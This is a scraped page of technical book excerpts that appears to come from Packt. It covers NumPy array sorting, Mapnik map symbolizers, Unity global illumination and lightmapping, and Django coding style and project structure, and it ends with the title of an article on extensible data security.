15, 16]) In [379]: ar=ar[:, np.newaxis]; ar.shape Out[379]: (3, 1) In [380]: ar Out[380]: array([[14],                  [15],                  [16]]) Array sorting Arrays can be sorted in various ways. Sort the array along an axis; first, let's discuss this along the y-axis: In [43]: ar=np.array([[3,2],[10,-1]])          ar Out[43]: array([[ 3, 2],                [10, -1]]) In [44]: ar.sort(axis=1)          ar Out[44]: array([[ 2, 3],                [-1, 10]]) Here, we will explain the sorting along the x-axis: In [45]: ar=np.array([[3,2],[10,-1]])          ar Out[45]: array([[ 3, 2],                [10, -1]]) In [46]: ar.sort(axis=0)          ar Out[46]: array([[ 3, -1],                [10, 2]]) Sorting by in-place (np.array.sort) and out-of-place (np.sort) functions. Other operations that are available for array sorting include the following: np.min(): It returns the minimum element in the array np.max(): It returns the maximum element in the array np.std(): It returns the standard deviation of the elements in the array np.var(): It returns the variance of elements in the array np.argmin(): It indices of minimum np.argmax(): It indices of maximum np.all(): It returns element-wise and all of the elements np.any(): It returns element-wise or all of the elements Summary In this article we discussed how numpy.ndarray is the bedrock data structure on which the pandas data structures are based. The pandas data structures at their heart consist of NumPy ndarray of data and an array or arrays of labels. There are three main data structures in pandas: Series, DataFrame, and Panel. The pandas data structures are much easier to use and more user-friendly than Numpy ndarrays, since they provide row indexes and column indexes in the case of DataFrame and Panel. The DataFrame object is the most popular and widely used object in pandas. Resources for Article: Further resources on this subject: Machine Learning [article] Financial Derivative – Options [article] Introducing Interactive Plotting [article]
Read more
  • 0
  • 0
  • 4873

article-image-symbolizers
Packt
18 Jun 2015
8 min read
Save for later

Symbolizers

Packt
18 Jun 2015
8 min read
In this article by Erik Westra, author of the book, Python Geospatial Analysis Essentials, we will see that symbolizers do the actual work of drawing a feature onto the map. Multiple symbolizers are often used to draw a single feature. There are many different types of symbolizers available within Mapnik, and many of the symbolizers have complex options associated with them. Rather than exhaustively listing all the symbolizers and their various options, we will instead just look at some of the more common types of symbolizers and how they can be used. (For more resources related to this topic, see here.) PointSymbolizer The PointSymbolizer class is used to draw an image centered over a Point geometry. By default, each point is displayed as a 4 x 4 pixel black square: To use a different image, you have to create a mapnik.PathExpression object to represent the path to the desired image file, and then pass that to the PointSymbolizer object when you instantiate it: path = mapnik.PathExpression("/path/to/image.png") point_symbol = PointSymbolizer(path) Note that PointSymbolizer draws the image centered on the desired point. To use a drop-pin image as shown in the preceding example, you will need to add extra transparent whitespace so that the tip of the pin is in the middle of the image, like this: You can control the opacity of the drawn image by setting the symbolizer's opacity attribute. You can also control whether labels will be drawn on top of the image by setting the allow_overlap attribute to True. Finally, you can apply an SVG transformation to the image by setting the transform attribute to a string containing a standard SVG transformation expression, for example point_symbol.transform = "rotate(45)". Documentation for the PointSymbolizer can be found at https://github.com/mapnik/mapnik/wiki/PointSymbolizer. LineSymbolizer A mapnik.LineSymbolizer is used to draw LineString geometries and the outlines of Polygon geometries. When you create a new LineSymbolizer, you would typically configure it using two parameters: the color to use to draw the line as a mapnik.Color object, and the width of the line, measured in pixels. For example: line_symbol = mapnik.LineSymbolizer(mapnik.Color("black"), 0.5) Notice that you can use fractional line widths; because Mapnik uses anti-aliasing, a line narrower than 1 pixel will often look better than a line with an integer width if you are drawing many lines close together. In addition to the color and the width, you can also make the line semi-transparent by setting the opacity attribute. This should be set to a number between 0.0 and 1.0, where 0.0 means the line will be completely transparent and 1.0 means the line will be completely opaque. You can also use the stroke attribute to get access to (or replace) the stroke object used by the line symbolizer. The stroke object, an instance of mapnik.Stroke, can be used for more complicated visual effects. For example, you can create a dashed line effect by calling the stroke's add_dash() method: line_symbol.stroke.add_dash(5, 7) Both numbers are measured in pixels; the first number is the length of the dash segment, while the second is the length of the gap between dashes. Note that you can create alternating dash patterns by calling add_dash() more than once. You can also set the stroke's line_cap attribute to control how the ends of the line should be drawn, and the stroke's line_join attribute to control how the joins between the individual line segments are drawn whenever the LineString changes direction. The line_cap attribute can be set to one of the following values: mapnik.line_cap.BUTT_CAP mapnik.line_cap.ROUND_CAP mapnik.line_cap.SQUARE_CAP The line_join attribute can be set to one of the following: mapnik.line_join.MITER_JOIN mapnik.line_join.ROUND_JOIN mapnik.line_join.BEVEL_JOIN Documentation for the LineSymbolizer class can be found at https://github.com/mapnik/mapnik/wiki/LineSymbolizer. PolygonSymbolizer The mapnik.PolygonSymbolizer class is used to fill the interior of a Polygon geometry with a given color. When you create a new PolygonSymbolizer, you would typically pass it a single parameter: the mapnik.Color object to use to fill the polygon. You can also change the opacity of the symbolizer by setting the fill_opacity attribute, for example: fill_symbol.fill_opacity = 0.8 Once again, the opacity is measured from 0.0 (completely transparent) to 1.0 (completely opaque). There is one other PolygonSymbolizer attribute which you might find useful: gamma. The gamma value can be set to a number between 0.0 and 1.0. The gamma value controls the amount of anti-aliasing used to draw the edge of the polygon; with the default gamma value of 1.0, the edges of the polygon will be fully anti-aliased. While this is usually a good thing, if you try to draw adjacent polygons with the same color, the antialiasing will cause the edges of the polygons to be visible rather than combining them into a single larger area. By turning down the gamma slightly (for example, fill_symbol.gamma = 0.6), the edges between adjacent polygons will disappear. Documentation for the PolygonSymbolizer class can be found at https://github.com/mapnik/mapnik/wiki/PolygonSymbolizer. TextSymbolizer The TextSymbolizer class is used to draw textual labels onto a map. This type of symbolizer can be used for point, LineString, and Polygon geometries. The following example shows how a TextSymbolizer can be used: text_symbol = mapnik.TextSymbolizer(mapnik.Expresion("[label]"), "DejaVu Sans Book", 10, mapnik.Color("black")) As you can see, four parameters are typically passed to the TextSymbolizer's initializer: A mapnik.Expression object defining the text to be displayed. In this case, the text to be displayed will come from the label attribute in the datasource. The name of the font to use for drawing the text. To see what fonts are available, type the following into the Python command line: import mapnik for font in mapnik.FontEngine.face_names():    print font The font size, measured in pixels. The color to use to draw the text. By default, the text will be drawn in the center of the geometry; for example: This positioning of the label is called point placement. The TextSymbolizer allows you to change this to use what is called line placement, where the label will be drawn along the lines: text_symbol.label_placement = mapnik.label_placement.LINE_PLACEMENT As you can see, this causes the label to be drawn along the length of a LineString geometry, or along the perimeter of a Polygon. The text won't be drawn at all for a Point geometry, since there are no lines within a point. The TextSymbolizer will normally just draw the label once, but you can tell the symbolizer to repeat the label if you wish by specifying a pixel gap to use between each label: text_symbol.label_spacing = 30 By default, Mapnik is smart enough to stop labels from overlapping each other. If possible, it moves the label slightly to avoid an overlap, and then hides the label completely if it would still overlap. For example: You can change this by setting the allow_overlap attribute: text_symbol.allow_overlap = True Finally, you can set a halo effect to draw a lighter-colored border around the text so that it is visible even against a dark background. For example, text_symbol.halo_fill = mapnik.Color("white") text_symbol.halo_radius = 1 There are many more labeling options, all of which are described at length in the documentation for the TextSymbolizer class. This can be found at https://github.com/mapnik/mapnik/wiki/TextSymbolizer. RasterSymbolizer The RasterSymbolizer class is used to draw raster-format data onto a map. This type of symbolizer is typically used in conjunction with a Raster or GDAL datasource. To create a new raster symbolizer, you instantiate a new mapnik.RasterSymbolizer object: raster_symbol = mapnik.RasterSymbolizer() The raster symbolizer will automatically draw any raster-format data provided by the map layer's datasource. This is often used to draw a basemap onto which the vector data is to be displayed; for example: While there are some advanced options to control the way the raster data is displayed, in most cases, the only option you might be interested in is the opacity attribute. As usual, this sets the opacity for the displayed image, allowing you to layer semi-transparent raster images one on top of the other. Documentation for the RasterSymbolizer can be found at https://github.com/mapnik/mapnik/wiki/RasterSymbolizer. Summary In this article, we covered different types of symbolizers, which are available in the Mapnik library. We also examined that symbolizers which can be used to display spatial features, how the visible extent is used to control the portion of the map to be displayed, and how to render a map as an image file. Resources for Article: Further resources on this subject: Python functions – Avoid repeating code [article] Preparing to Build Your Own GIS Application [article] Server Logs [article]
Read more
  • 0
  • 0
  • 3517

article-image-global-illumination
Packt
17 Jun 2015
16 min read
Save for later

Global Illumination

Packt
17 Jun 2015
16 min read
In this article by Volodymyr Gerasimov, the author of the book, Building Levels in Unity, you will see two types of lighting that you need to take into account if you want to create well lit levels—direct and indirect. Direct light is the one that is coming directly from the source. Indirect light is created by light bouncing off the affected area at a certain angle with variable intensity. In the real world, the number of bounces is infinite and that is the reason why we can see dark areas that don't have light shining directly at them. In computer software, we don't yet have the infinite computing power at our disposal to be able to use different tricks to simulate the realistic lighting at runtime. The process that simulates indirect lighting, light bouncing, reflections, and color bleeding is known as Global Illumination (GI). Unity 5 is powered by one of the industry's leading technologies for handling indirect lighting (radiosity) in the gaming industry, called Enlighten by Geomerics. Games such as Battlefield 3-4, Medal of Honor: Warfighter, Need for Speed the Run and Dragon Age: Inquisition are excellent examples of what this technology is capable of, and now all of that power is at your fingertips completely for free! Now, it's only appropriate to learn how to tame this new beast. (For more resources related to this topic, see here.) Preparing the environment Realtime realistic lighting is just not feasible at our level of computing power, which forces us into inventing tricks to simulate it as close as possible, but just like with any trick, there are certain conditions that need to be met in order for it to work properly and keep viewer's eyes from exposing our clever deception. To demonstrate how to work with these limitations, we are going to construct a simple light set up for the small interior scene and talk about solutions to the problems as we go. For example, we will use the LightmappingInterior scene that can be found in the Chapter 7 folder in the Project window. It's a very simple interior and should take us no time to set up. The first step is to place the lights. We will be required to create two lights: a Directional to imitate the moonlight coming from the crack in the dome and a Point light for the fire burning in the goblet, on the ceiling.   Tune the light's Intensity, Range (in Point light's case), and Color to your liking. So far so good! We can see the direct lighting coming from the moonlight, but there is no trace of indirect lighting. Why is this happening? Should GI be enabled somehow for it to work? As a matter of fact, it does and here comes the first limitation of Global Illumination—it only works on GameObjects that are marked as Static. Static versus dynamic objects Unity objects can be of one of the two categories: static or dynamic. Differentiation is very simple: static objects don't move, they stay still where they are at all times, they neither play any animations nor engage in any kind of interactions. The rest of the objects are dynamic. By default, all objects in Unity are dynamic and can only be converted into static by checking the Static checkbox in the Inspector window.   See it for yourself. Try to mark an object as static in Unity and attempt to move it around in the Play mode. Does it work? Global Illumination will only work with static objects; this means, before we go into the Play mode right above it, we need to be 100 percent sure that the objects that will cast and receive indirect lights will not stop doing that from their designated positions. However, why is that you may ask, isn't the whole purpose of Realtime GI to calculate indirect lighting in runtime? The answer to that would be yes, but only to an extent. The technology behind this is called Precomputed Realtime GI, according to Unity developers it precomputes all possible bounces that the light can make and encodes them to be used in realtime; so it essentially tells us that it's going to take a static object, a light and answer a question: "If this light is going to travel around, how is it going to bounce from the affected surface of the static object from every possible angle?"   During runtime, lights are using this encoded data as instructions on how the light should bounce instead of calculating it every frame. Having static objects can be beneficial in many other ways, such as pathfinding, but that's a story for another time. To test this theory, let's mark objects in the scene as Static, meaning they will not move (and can't be forced to move) by physics, code or even transformation tools (the latter is only true during the Play mode). To do that, simply select Pillar, Dome, WaterProNighttime, and Goblet GameObjects in the Hierarchy window and check the Static checkbox at the top-right corner of the Inspector window. Doing that will cause Unity to recalculate the light and encode bouncing information. Once the process has finished (it should take no time at all), you can hit the Play button and move the light around. Notice that bounce lighting is changing as well without any performance overhead. Fixing the light coming from the crack The moonlight inside the dome should be coming from the crack on its surface, however, if you rotate the directional light around, you'll notice that it simply ignores concrete walls and freely shines through. Naturally, that is incorrect behavior and we can't have that stay. We can clearly see through the dome ourselves from the outside as a result of one-sided normals. Earlier, the solution was to duplicate the faces and invert the normals; however, in this case, we actually don't mind seeing through the walls and only want to fix the lighting issue. To fix this, we need to go to the Mesh Render component of the Dome GameObject and select the Two Sided option from the drop-down menu of the Cast Shadows parameter.   This will ignore backface culling and allow us to cast shadows from both sides of the mesh, thus fixing the problem. In order to cast shadows, make sure that your directional light has Shadow Type parameter set to either Hard Shadows or Soft Shadows.   Emission materials Another way to light up the level is to utilize materials with Emission maps. Pillar_EmissionMaterial applied to the Pillar GameObject already has an Emission map assigned to it, all that is left is to crank up the parameter next to it, to a number which will give it a noticeable effect (let's say 3). Unfortunately, emissive materials are not lights, and precomputed GI will not be able to update indirect light bounce created by the emissive material. As a result, changing material in the Play mode will not cause the update. Changes done to materials in the Play mode will be preserved in the Editor. Shadows An important byproduct of lighting is shadows cast by affected objects. No surprises here! Unity allows us to cast shadows by both dynamic and static objects and have different results based on render settings. By default, all lights in Unity have shadows disabled. In order to enable shadows for a particular light, we need to modify the Shadow Type parameter to be either Hard Shadows or Soft Shadows in the Inspector window.   Enabling shadows will grant you access to three parameters: Strength: This is the darkness of shadows, from 0 to 1. Resolution: This controls the resolution of the shadows. This parameter can utilize the value set in the Use Quality Settings or be selected individually from the drop down menu. Bias and Normal Bias – this is the shadow offset. These parameters are used to prevent an artifact known as Shadow Acne (pixelated shadows in lit areas); however, setting them too high can cause another artifact known as Peter Panning (disconnected shadow). Default values usually help us to avoid both issues. Unity is using a technique known as Shadow Mapping, which determines the objects that will be lit by assuming the light's perspective—every object that light sees directly, is lit; every object that isn't seen should be in the shadow. After rendering the light's perspective, Unity stores the depth of each surface into a shadow map. In the cases where the shadow map resolution is low, this can cause some pixels to appear shaded when they shouldn't be (Shadow Acne) or not have a shadow where it's supposed to be (Peter Panning), if the offset is too high. Unity allows you to control the objects that should receive or cast shadows by changing the parameters Cast Shadows and Receive Shadows in the Rendering Mesh component of a GameObject. Lightmapping Every year, more and more games are being released with real-time rendering solutions that allow for more realistic-looking environments at the price of ever-growing computing power of modern PCs and consoles. However, due to the limiting hardware capabilities of mobile platforms, it is still a long time before we are ready to part ways with cheap and affordable techniques such as lightmapping. Lightmapping is a technology for precomputing brightness of surfaces, also known as baking, and storing it in a separate texture—a lightmap. In order to see lighting in the area, we need to be able to calculate it at least 30 times per second (or more, based on fps requirements). This is not very cheap; however, with lightmapping we can calculate lighting once and then apply it as a texture. This technology is suitable for static objects that artists know will never be moved; in a nutshell, this process involves creating a scene, setting up the lighting rig and clicking Bake to get great lighting with minimum performance issues during runtime. To demonstrate the lightmapping process, we will take the scene and try to bake it using lightmapping. Static versus dynamic lights We've just talked about a way to guarantee that the GameObjects will not move. But what about lights? Hitting the Static checkbox for lights will not achieve much (unless you simply want to completely avoid the possibility of accidentally moving them). The problem at hand is that light, being a component of an object, has a separate set of controls allowing them to be manipulated even if the holder is set to static. For that purpose, each light has a parameter that allows us to specify the role of individual light and its contribution to the baking process, this parameter is called Baking. There are three options available for it: Realtime: This option will exclude this particular light from the baking process. It is totally fine to use real-time lighting, precomputed GI will make sure that modern computers and consoles are able to handle them quite smoothly. However, they might cause an issue if you are developing for the mobile platforms which will require every bit of optimization to be able to run with a stable frame rate. There are ways to fake real-time lighting with much cheaper options,. The only thing you should consider is that the number of realtime lights should be kept at a minimum if you are going for maximum optimization. Realtime will allow lights to affect static and dynamic objects. Baked: This option will include this light into the baking process. However, there is a catch: only static objects will receive light from it. This is self-explanatory—if we want dynamic objects to receive lighting, we need to calculate it every time the position of an object changes, which is what Realtime lighting does. Baked lights are cheap, calculated once we have stored all lighting information on a hard drive and using it from there, no further recalculation is required during runtime. It is mostly used on small situational lights that won't have a significant effect on dynamic objects. Mixed: This one is a combination of the previous two options. It bakes the lights into the static objects and affects the dynamic objects as they pass by. Think of the street lights: you want the passing cars to be affected; however, you have no need to calculate the lighting for the static environment in realtime. Naturally, we can't have dynamic objects move around the level unlit, no matter how much we'd like to save on computing power. Mixed will allow us to have the benefit of the baked lighting on the static objects as well as affect the dynamic objects at runtime. The first step that we are going to take is changing the Baking parameter of our lights from Realtime to Baked and enabling Soft Shadows:   You shouldn't notice any significant difference, except for the extra shadows appearing. The final result isn't too different from the real-time lighting. Its performance is much better, but lacks the support of dynamic objects. Dynamic shadows versus static shadows One of the things that get people confused when starting to work with shadows in Unity is how they are being cast by static and dynamic objects with different Baking settings on the light source. This is one of those things that you simply need to memorize and keep in mind when planning the lighting in the scene. We are going to explore how different Baking options affect the shadow casting between different combinations of static and dynamic objects: As you can see, real-time lighting handles everything pretty well; all the objects are casting shadows onto each other and everything works as intended. There is even color bleeding happening between two static objects on the right. With Baked lighting the result isn't that inspiring. Let's break it down. Dynamic objects are not lit. If the object is subject to change at runtime, we can't preemptively bake it into the lightmap; therefore, lights that are set to Baked will simply ignore them. Shadows are only cast by static objects onto static objects. This correlates to the previous statement that if we aren't sure that the object is going to change we can't safely bake its shadows into the shadow map. With Mixed we get a similar result as with real-time lighting, except for one instance: dynamic objects are not casting shadows onto static objects, but the reverse does work: static objects are casting shadows onto the dynamic objects just fine, so what's the catch? Each object gets individual treatment from the Mixed light: those that are static are treated as if they are lit by the Baked light and dynamic are lit in realtime. In other words, when we are casting a shadow onto a dynamic object, it is calculated in realtime, while when we are casting shadow onto the static object, it is baked and we can't bake a shadow that is cast by the object that is subject to change. This was never the case with real-time lighting, since we were calculating the shadows at realtime, regardless of what they were cast by or cast onto. And again, this is just one scenario that you need to memorize. Lighting options The Lighting window has three tabs: Object, Scene, and Lightmap. For now we will focus on the first one. The main content of an Object tab is information on objects that are currently selected. This allows us to get quick access to a list of controls, to better tweak selected objects for lightmapping and GI. You can switch between object types with the help of Scene Filter at the top; this is a shortcut to filtering objects in the Hierarchy window (this will not filter the selected GameObjects, but everything in the Hierarchy window). All GameObjects need to be set to Static in order to be affected by the lightmapping process; this is why the Lightmap Static checkbox is the first in the list for Mesh Renderers. If you haven't set the object to static in the Inspector window, checking the Lightmap Static box will do just that. The Scale in Lightmap parameter controls the lightmap resolution. The greater the value, the bigger the resolution given to the object's lightmap, resulting in better lighting effects and shadows. Setting the parameter to 0 will result in an object not being affected by lightmapping. Unless you are trying to fix lighting artifacts on the object, or going for the maximum optimization, you shouldn't touch this parameter; there is a better way to adjust the lightmap resolution for all objects in the scene; Scale in Lightmap scales in relation to global value. The rest of the parameters are very situational and quite advanced, they deal with UVs, extend the effect of GI on the GameObject, and give detailed information on the lightmap. For lights, we have a baking parameter with three options: Realtime, Baked, or Mixed. Naturally, if you want this light for lightmapping, Realtime is not an option, so you should pick Baked or Mixed. Color and Intensity are referenced from the Inspector window and can be adjusted in either place. Baked Shadows allows us to choose the shadow type that will be baked (Hard, Soft, Off). Summary Lighting is a difficult process that is deceptively easy to learn, but hard to master. In Unity, lighting isn't without its issues. Attempting to apply real-world logic to 3D rendering will result in a direct confrontation with limitations posed by imperfect simulation. In order to solve issues that may arise, one must first understand what might be causing them, in order to isolate the problem and attempt to find a solution. Alas, there are still a lot of topics left uncovered that are outside of the realm of an introduction. If you wish to learn more about lighting, I would point you again to the official documentation and developer blogs, where you'll find a lot of useful information, tons of theory, practical recommendations, as well as in-depth look into all light elements discussed. Resources for Article: Further resources on this subject: Learning NGUI for Unity [article] Saying Hello to Unity and Android [article] Components in Unity [article]
Read more
  • 0
  • 0
  • 24587
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at €18.99/month. Cancel anytime
article-image-code-style-django
Packt
17 Jun 2015
16 min read
Save for later

Code Style in Django

Packt
17 Jun 2015
16 min read
In this article written by Sanjeev Jaiswal and Ratan Kumar, authors of the book Learning Django Web Development, this article will cover all the basic topics which you would require to follow, such as coding practices for better Django web development, which IDE to use, version control, and so on. We will learn the following topics in this article: Django coding style Using IDE for Django web development Django project structure This article is based on the important fact that code is read much more often than it is written. Thus, before you actually start building your projects, we suggest that you familiarize yourself with all the standard practices adopted by the Django community for web development. Django coding style Most of Django's important practices are based on Python. Though chances are you already know them, we will still take a break and write all the documented practices so that you know these concepts even before you begin. To mainstream standard practices, Python enhancement proposals are made, and one such widely adopted standard practice for development is PEP8, the style guide for Python code–the best way to style the Python code authored by Guido van Rossum. The documentation says, "PEP8 deals with semantics and conventions associated with Python docstrings." For further reading, please visit http://legacy.python.org/dev/peps/pep-0008/. Understanding indentation in Python When you are writing Python code, indentation plays a very important role. It acts as a block like in other languages, such as C or Perl. But it's always a matter of discussion amongst programmers whether we should use tabs or spaces, and, if space, how many–two or four or eight. Using four spaces for indentation is better than eight, and if there are a few more nested blocks, using eight spaces for each indentation may take up more characters than can be shown in single line. But, again, this is the programmer's choice. The following is what incorrect indentation practices lead to: >>> def a(): ...   print "foo" ...     print "bar" IndentationError: unexpected indent So, which one we should use: tabs or spaces? Choose any one of them, but never mix up tabs and spaces in the same project or else it will be a nightmare for maintenance. The most popular way of indention in Python is with spaces; tabs come in second. If any code you have encountered has a mixture of tabs and spaces, you should convert it to using spaces exclusively. Doing indentation right – do we need four spaces per indentation level? There has been a lot of confusion about it, as of course, Python's syntax is all about indentation. Let's be honest: in most cases, it is. So, what is highly recommended is to use four spaces per indentation level, and if you have been following the two-space method, stop using it. There is nothing wrong with it, but when you deal with multiple third party libraries, you might end up having a spaghetti of different versions, which will ultimately become hard to debug. Now for indentation. When your code is in a continuation line, you should wrap it vertically aligned, or you can go in for a hanging indent. When you are using a hanging indent, the first line should not contain any argument and further indentation should be used to clearly distinguish it as a continuation line. A hanging indent (also known as a negative indent) is a style of indentation in which all lines are indented except for the first line of the paragraph. The preceding paragraph is the example of hanging indent. The following example illustrates how you should use a proper indentation method while writing the code: bar = some_function_name(var_first, var_second,                                            var_third, var_fourth) # Here indentation of arguments makes them grouped, and stand clear from others. def some_function_name(        var_first, var_second, var_third,        var_fourth):    print(var_first) # This example shows the hanging intent. We do not encourage the following coding style, and it will not work in Python anyway: # When vertical alignment is not used, Arguments on the first line are forbidden foo = some_function_name(var_first, var_second,    var_third, var_fourth) # Further indentation is required as indentation is not distinguishable between arguments and source code. def some_function_name(    var_first, var_second, var_third,    var_fourth):    print(var_first) Although extra indentation is not required, if you want to use extra indentation to ensure that the code will work, you can use the following coding style: # Extra indentation is not necessary. if (this    and that):    do_something() Ideally, you should limit each line to a maximum of 79 characters. It allows for a + or – character used for viewing difference using version control. It is even better to limit lines to 79 characters for uniformity across editors. You can use the rest of the space for other purposes. The importance of blank lines The importance of two blank lines and single blank lines are as follows: Two blank lines: A double blank lines can be used to separate top-level functions and the class definition, which enhances code readability. Single blank lines: A single blank line can be used in the use cases–for example, each function inside a class can be separated by a single line, and related functions can be grouped together with a single line. You can also separate the logical section of source code with a single line. Importing a package Importing a package is a direct implication of code reusability. Therefore, always place imports at the top of your source file, just after any module comments and document strings, and before the module's global and constants as variables. Each import should usually be on separate lines. The best way to import packages is as follows: import os import sys It is not advisable to import more than one package in the same line, for example: import sys, os You may import packages in the following fashion, although it is optional: from django.http import Http404, HttpResponse If your import gets longer, you can use the following method to declare them: from django.http import ( Http404, HttpResponse, HttpResponsePermanentRedirect ) Grouping imported packages Package imports can be grouped in the following ways: Standard library imports: Such as sys, os, subprocess, and so on. import reimport simplejson Related third party imports: These are usually downloaded from the Python cheese shop, that is, PyPy (using pip install). Here is an example: from decimal import * Local application / library-specific imports: This included the local modules of your projects, such as models, views, and so on. from models import ModelFoofrom models import ModelBar Naming conventions in Python/Django Every programming language and framework has its own naming convention. The naming convention in Python/Django is more or less the same, but it is worth mentioning it here. You will need to follow this while creating a variable name or global variable name and when naming a class, package, modules, and so on. This is the common naming convention that we should follow: Name the variables properly: Never use single characters, for example, 'x' or 'X' as variable names. It might be okay for your normal Python scripts, but when you are building a web application, you must name the variable properly as it determines the readability of the whole project. Naming of packages and modules: Lowercase and short names are recommended for modules. Underscores can be used if their use would improve readability. Python packages should also have short, all-lowercase names, although the use of underscores is discouraged. Since module names are mapped to file names (models.py, urls.py, and so on), it is important that module names be chosen to be fairly short as some file systems are case insensitive and truncate long names. Naming a class: Class names should follow the CamelCase naming convention, and classes for internal use can have a leading underscore in their name. Global variable names: First of all, you should avoid using global variables, but if you need to use them, prevention of global variables from getting exported can be done via __all__, or by defining them with a prefixed underscore (the old, conventional way). Function names and method argument: Names of functions should be in lowercase and separated by an underscore and self as the first argument to instantiate methods. For classes or methods, use CLS or the objects for initialization. Method names and instance variables: Use the function naming rules—lowercase with words separated by underscores as necessary to improve readability. Use one leading underscore only for non-public methods and instance variables. Using IDE for faster development There are many options on the market when it comes to source code editors. Some people prefer full-fledged IDEs, whereas others like simple text editors. The choice is totally yours; pick up whatever feels more comfortable. If you already use a certain program to work with Python source files, I suggest that you stick to it as it will work just fine with Django. Otherwise, I can make a couple of recommendations, such as these: SublimeText: This editor is lightweight and very powerful. It is available for all major platforms, supports syntax highlighting and code completion, and works well with Python. The editor is open source and you can find it at http://www.sublimetext.com/ PyCharm: This, I would say, is most intelligent code editor of all and has advanced features, such as code refactoring and code analysis, which makes development cleaner. Features for Django include template debugging (which is a winner) and also quick documentation, so this look-up is a must for beginners. The community edition is free and you can sample a 30-day trial version before buying the professional edition. Setting up your project with the Sublime text editor Most of the examples that we will show you in this book will be written using Sublime text editor. In this section, we will show how to install and set up the Django project. Download and installation: You can download Sublime from the download tab of the site www.sublimetext.com. Click on the downloaded file option to install. Setting up for Django: Sublime has a very extensive plug-in ecosystem, which means that once you have downloaded the editor, you can install plug-ins for adding more features to it. After successful installation, it will look like this: Most important of all is Package Control, which is the manager for installing additional plugins directly from within Sublime. This will be your only manual installation of the package. It will take care of the rest of the package installation ahead. Some of the recommendations for Python development using Sublime are as follows: Sublime Linter: This gives instant feedback about the Python code as you write it. It also has PEP8 support; this plugin will highlight in real time the things we discussed about better coding in the previous section so that you can fix them.   Sublime CodeIntel: This is maintained by the developer of SublimeLint. Sublime CodeIntel have some of advanced functionalities, such as directly go-to definition, intelligent code completion, and import suggestions.   You can also explore other plugins for Sublime to increase your productivity. Setting up the pycharm IDE You can use any of your favorite IDEs for Django project development. We will use pycharm IDE for this book. This IDE is recommended as it will help you at the time of debugging, using breakpoints that will save you a lot of time figuring out what actually went wrong. Here is how to install and set up pycharm IDE for Django: Download and installation: You can check the features and download the pycharm IDE from the following link: http://www.jetbrains.com/pycharm/ Setting up for Django: Setting up pycharm for Django is very easy. You just have to import the project folder and give the manage.py path, as shown in the following figure: The Django project structure The Django project structure has been changed in the 1.6 release version. Django (django-admin.py) also has a startapp command to create an application, so it is high time to tell you the difference between an application and a project in Django. A project is a complete website or application, whereas an application is a small, self-contained Django application. An application is based on the principle that it should do one thing and do it right. To ease out the pain of building a Django project right from scratch, Django gives you an advantage by auto-generating the basic project structure files from which any project can be taken forward for its development and feature addition. Thus, to conclude, we can say that a project is a collection of applications, and an application can be written as a separate entity and can be easily exported to other applications for reusability. To create your first Django project, open a terminal (or Command Prompt for Windows users), type the following command, and hit Enter: $ django-admin.py startproject django_mytweets This command will make a folder named django_mytweets in the current directory and create the initial directory structure inside it. Let's see what kind of files are created. The new structure is as follows: django_mytweets/// django_mytweets/ manage.py This is the content of django_mytweets/: django_mytweets/ __init__.py settings.py urls.py wsgi.py Here is a quick explanation of what these files are: django_mytweets (the outer folder): This folder is the project folder. Contrary to the earlier project structure in which the whole project was kept in a single folder, the new Django project structure somehow hints that every project is an application inside Django. This means that you can import other third party applications on the same level as the Django project. This folder also contains the manage.py file, which include all the project management settings. manage.py: This is utility script is used to manage our project. You can think of it as your project's version of django-admin.py. Actually, both django-admin.py and manage.py share the same backend code. Further clarification about the settings will be provided when are going to tweak the changes. Let's have a look at the manage.py file: #!/usr/bin/env python import os import sys if __name__ == "__main__":    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "django_mytweets.settings")    from django.core.management import   execute_from_command_line    execute_from_command_line(sys.argv) The source code of the manage.py file will be self-explanatory once you read the following code explanation. #!/usr/bin/env python The first line is just the declaration that the following file is a Python file, followed by the import section in which os and sys modules are imported. These modules mainly contain system-related operations. import os import sys The next piece of code checks whether the file is executed by the main function, which is the first function to be executed, and then loads the Django setting module to the current path. As you are already running a virtual environment, this will set the path for all the modules to the path of the current running virtual environment. if __name__ == "__main__":    os.environ.setdefault("DJANGO_SETTINGS_MODULE",     "django_mytweets.settings") django_mytweets/ ( Inner folder) __init__.py Django projects are Python packages, and this file is required to tell Python that this folder is to be treated as a package. A package in Python's terminology is a collection of modules, and they are used to group similar files together and prevent naming conflicts. settings.py: This is the main configuration file for your Django project. In it, you can specify a variety of options, including database settings, site language(s), what Django features need to be enabled, and so on. By default, the database is configured to use SQLite Database, which is advisable to use for testing purposes. Here, we will only see how to enter the database in the settings file; it also contains the basic setting configuration, and with slight modification in the manage.py file, it can be moved to another folder, such as config or conf. To make every other third-party application a part of the project, we need to register it in the settings.py file. INSTALLED_APPS is a variable that contains all the entries about the installed application. As the project grows, it becomes difficult to manage; therefore, there are three logical partitions for the INSTALLED_APPS variable, as follows: DEFAULT_APPS: This parameter contains the default Django installed applications (such as the admin) THIRD_PARTY_APPS: This parameter contains other application like SocialAuth used for social authentication LOCAL_APPS: This parameter contains the applications that are created by you url.py: This is another configuration file. You can think of it as a mapping between URLs and the Django view functions that handle them. This file is one of Django's more powerful features. When we start writing code for our application, we will create new files inside the project's folder. So, the folder also serves as a container for our code. Now that you have a general idea of the structure of a Django project, let's configure our database system. Summary We prepared our development environment in this article, created our first project, set up the database, and learned how to launch the Django development server. We learned the best way to write code for our Django project and saw the default Django project structure. Resources for Article: Further resources on this subject: Tinkering Around in Django JavaScript Integration [article] Adding a developer with Django forms [article] So, what is Django? [article]
Read more
  • 0
  • 0
  • 8916

article-image-developing-extensible-data-security
Packt
17 Jun 2015
7 min read
Save for later

Developing Extensible Data Security

Packt
17 Jun 2015
7 min read
